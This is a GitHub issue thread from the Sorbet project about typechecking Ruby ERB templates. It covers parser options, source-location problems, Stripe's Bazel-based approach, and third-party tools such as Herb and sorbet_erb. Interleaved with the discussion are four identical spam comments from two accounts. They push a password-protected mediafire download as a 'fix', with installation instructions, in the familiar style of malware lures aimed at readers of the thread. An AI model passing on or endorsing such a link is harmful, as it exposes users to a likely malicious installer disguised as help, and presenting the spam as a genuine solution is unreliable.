### ISSUE TITLE
Implementing ERB support

### ISSUE THREAD

**Issue by camertron** [sorbet/sorbet#8148]
### Problem

Hey Sorbet team! 👋 I work on GitHub's Core UX team and am exploring the viability of typechecking ERB files. I think we would start with ERB templates attached to ViewComponents since it's much easier to know what instance variables, etc the template has access to than, eg. some arbitrary Rails partial.

I'm proposing this internally at GitHub because I think it could have a significant impact on our ability to safely refactor our components and migrate to newer versions.

### Proposed solution

My initial thoughts are to require the developer to add a `T.bind(self, ComponentClass)` at the top of the template, although I don't know if that would work as expected (some guidance here would be appreciated).

The first hurdle however is getting Sorbet to load and parse ERB files. I've had a read through the code and I believe I've found where the changes would need to happen, but I wanted to reach out first to make sure this is something the Sorbet team would be interested in reviewing, merging, and ultimately supporting long-term.

I could also see supporting other templating languages like HAML, Slim, etc further down the road. Since ERB is part of Ruby's standard library though, I think it makes sense to add first-party support for it in Sorbet without needing to think about other languages.

Let me know what you think!

**Comment by jez** [comment]
I have to caveat this by saying I'm particularly skeptical of ERB support making it into Sorbet, but setting personal opinions aside, I'll try to dive into the specifics.


> My initial thoughts are to require the developer to add a `T.bind(self, ComponentClass)` at the top of the template, although I don't know if that would work as expected (some guidance here would be appreciated).

There are multiple ERB implementations. I'm know of the `erb`, `erubis`, and `erubi` gems, there might be more. I'm not sure that they're all compatible? I worry that attempting to treat contents of `.erb` suffix uniformly for the sake of type checking is difficult. I'm pretty sure that each of these implementations supports subtly different syntax.

e.g., maybe `T.bind(self, ComponentClass)` works for the way that ERB files are used in GitHub's codebase, but I'm not familiar enough with how ERB works to say that it would work universally. Which is to say: unfortunately we can't provide guidance here.

> The first hurdle however is getting Sorbet to load and parse ERB files.

For now let's set aside the issue of multiple ERB implementations (meaning that the way that you load an ERB file is different based on which gem you use), and say that it's just [ruby/erb](https://github.com/ruby/erb).

There are two approaches which involve changing Sorbet:

- Teach Sorbet to parse ERB files directly.

  This would be the ideal, because accurate location information in the parse result is crucial: to report type errors at positions at the right places, to figure out what's under the user's cursor for hover and go to definition, to surface find all references results, etc.

  This requires writing a C or C++ reimplementation of ERB syntax. This sounds like a lot of work, but there are people who like writing parsers far more than me, and having a fast ERB parser would probably be a net win for the ecosystem anyways, so I certainly won't discourage anyone who wants to take this on.

- Fork a subprocess to render an ERB file to Ruby source code, and then feed that Ruby source code into Sorbet. This means that all the locations are wrong.

  Maybe you could solve this with some sort of source map mechanism, but there would still be other problems, namely performance and implementation complexity.

  In fact, an earlier version of Sorbet [used this forking technique](https://github.com/sorbet/sorbet/pull/191) as a way to allow people to translate DSLs to statically analyzable Ruby code on-the-fly, and it was [explicitly removed](https://github.com/sorbet/sorbet/pull/3983) because it was slow and complex. Specifically, it added a ton of complexity to when trying to manage it from within Sorbet's LSP implementation, which is very concurrent and has lots of thread communicating with shared state.
  
  Forking a subprocess which runs Ruby code to produce a String is not the kind of fast performance people expect from Sorbet, and also adds a lot of maintenance burden for our already small team to deal with.
  
  For all the downsides, I basically don't see this approach working with Sorbet.

So unless someone is willing to write an ERB parser in C or C++, the remaining option is to have some external build tool compile ERB files to Ruby source code, and feed that into Sorbet. This still has the downside that the source locations are wrong, but at least you don't have to substantially complicate Sorbet's internals and and slow down Sorbet. It also means that the build tool can use the exact ERB implementation that any given project uses, without needing to teach Sorbet about idiosyncrasies of individual ERB tools.

In fact, **this is the approach used at Stripe**. There is a daemon running on all engineers' devboxes which, among other things, uses our build tool (Bazel) to generate one `*.rb` file for each `*.erb`. The directory containing these ERB files is fed into Sorbet when type checking.

For us, it was enough to just make these files `# typed: false` and not attempt to track the types of any methods or local variables which are in scope while rendering these templates. If that had been a priority for the team(s) at Stripe who set that build pipeline up, I imagine that it would not have been too hard to post-process the Ruby source generated from the ERB implementation we use to do things like insert `T.bind` at the top, or wrap all ERB files in a method which has explicitly declares the template's inputs.

- - - - -

This is probably not the answer you're looking for, but basically unless someone writes a C/C++ ERB parser implementation, it's going to be better to approach the problem of typechecking ERBs from a build tool which feeds into Sorbet, not within Sorbet itself.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by camertron** [comment]
Hey @jez, thanks for your awesome and thorough response!

> I worry that attempting to treat contents of .erb suffix uniformly for the sake of type checking is difficult. I'm pretty sure that each of these implementations supports subtly different syntax.

That's true, but in every case I'm aware of, the syntax is subtly different in only predictable or unimportant ways. For example, some implementations allow for the `<%- code -%>` syntax which automatically strips whitespace. Since stripping whitespace isn't important for typechecking purposes, we can ignore it. There are other so-called "indicators" aside from "-" like "=", "==", "%", etc that are all required to end with a space. Rather than enumerate all these in a parser, we should be able to allow 1..2 characters following the "%".

Other syntactic differences like block handling shouldn't pose a problem. The approach I would take integrating ERB into Sorbet would be to strip out all the non-Ruby code (leaving in whitespace) and typecheck the result. Sorbet should be able to do this without considering how the template would or would not be interpreted by any particular ERB engine, since typechecking doesn't care about rendering.

> e.g., maybe T.bind(self, ComponentClass) works for the way that ERB files are used in GitHub's codebase, but I'm not familiar enough with how ERB works to say that it would work universally. Which is to say: unfortunately we can't provide guidance here.

Yeah, this is going to be tricky. In Rails, ERB templates are compiled into autogenerated methods on a giant module. Rendering a template is a matter of generating the method name in the controller and calling it, which is all handled internally by Rails. I believe that module is constructed entirely in memory, so we would have to devise a way to dump it into a file. Adding `T.bind` statements would likely work as expected, since I believe they are permitted at the method level, but I'm not sure how it would work with other frameworks and tools. ERB compiles into Ruby code but without any kind of wrapper, etc. Does Sorbet support `T.bind` for top-level code blocks?

> This requires writing a C or C++ reimplementation of ERB syntax

Yes, that was my initial idea as well. ERB has a very small grammar so I don't think it would be _too_ terribly difficult to accomplish. Famous last words.

> Fork a subprocess to render an ERB file to Ruby source code, and then feed that Ruby source code into Sorbet. This means that all the locations are wrong.

Right, I don't think this approach makes much sense for all the reasons you enumerated (performance, location accuracy, etc). A parser written in C++ is definitely the way to go.

I could also see Sorbet adopt a strategy pattern that allows people to plug in handlers for various file extensions, which would allow the ecosystem to write parsers in C++ without having to write them directly into Sorbet.

> There is a daemon running on all engineers' devboxes which, among other things, uses our build tool (Bazel) to generate one `*.rb` file for each `*.erb` file

Oh that's fascinating... maybe we could adopt a similar strategy, thanks for the great idea!

**Comment by marcoroth** [comment]
Hey friends, I have been working on the new [Herb Parser and ecosystem](https://github.com/marcoroth/herb) (written in C) for improving the tooling support in HTML+ERB files. I had this issue bookmarked for a while, but felt it's time now to reply, as Herb seems to be working.

Given @jez mentioned this:

> This is probably not the answer you're looking for, but basically unless someone writes a C/C++ ERB parser implementation, it's going to be better to approach the problem of typechecking ERBs from a build tool which feeds into Sorbet, not within Sorbet itself.

Does it make more sense for Herb to integrate with Sorbet, or would it make more sense for Sorbet to support ERB directly? Happy to work/contribute to make Sorbet work in (HTML+)ERB properly!

**Comment by danny-pflughoeft** [comment]
I've been using the [sorbet_erb](https://github.com/franklinhu/sorbet_erb) project to add Sorbet support to our ERB files. We have a fairly large Rails project, and it's been working pretty well so far.

The only problem is that the typing information needs to be added in each ERB, even though the majority of it could, in theory, be done automatically by looking at the controller classes.
